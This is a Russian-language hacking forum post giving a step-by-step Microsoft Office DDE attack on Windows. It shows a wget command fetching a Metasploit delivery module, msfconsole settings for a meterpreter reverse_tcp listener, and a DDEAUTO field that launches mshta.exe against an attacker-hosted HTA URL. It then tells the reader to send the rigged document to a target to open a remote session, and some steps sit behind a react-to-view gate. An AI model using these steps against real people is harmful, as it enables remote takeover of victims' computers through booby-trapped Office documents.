Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
mr.save

Тестирование на проникновение Windows с использованием Microsoft Office DDE Exploit (MACROLESS)

Recommended Posts

Эксплуатация DDE также была известна как динамический обмен данными, она позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем.

Хакеры использовали этот метод для выполнения вредоносных скриптов для компрометации данных.

Об этом сообщили в Microsoft от Sensepost, Etienne Stalmans и Saif El-Sherei, но это не было исправлено, так как многие приложения используют протокол DDE.

Этот эксплойт не требует включения макро-функции.

Предпосылки — DDE эксплойт

Windows машина

Microsoft Office (любая версия)

Kali Linux

Нам придется импортировать эксплойт Metasploit.

Загрузите его с GitHub с помощью команды терминала:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Переместите скрипт в местоположение Metasploit

mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

Теперь введите msfconsole в терминале, который запускает инфраструктуру Metasploit, и введите reload_all для загрузки модулей.

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

Этот эксплойт использует функцию dde для доставки полезной нагрузки hta. Теперь введите:

  • use exploit/windows/dde_deliverythen set the sever host using the following command
  •  set SRVHOST 192.168.177.141

нам нужно установить прослушатель полезной нагрузки.

Не используйте порт 8080, поскольку порт сервера по умолчанию установлен на 8080

  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST 192.168.177.141
  • set LPORT 6708
  • exploit

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

Теперь скопируйте и вставьте код в любой текстовый документ.

Мы использовали Office 365 Pro Plus, полностью обновленный.

Найдите формулу, и у вас должно появиться небольшое окно с ошибкой в документе, а затем щелкните правой кнопкой мыши код переключения.

Вставьте команду в документ в скобках.

Сохраните документ.

  • {DDEAUTO
  • C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

Отправьте документ подозреваемому, и откроется сеанс счетчика.

=====Если совсем отбитый=====

sessions -i 1

sysinfo -

Share this post


Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...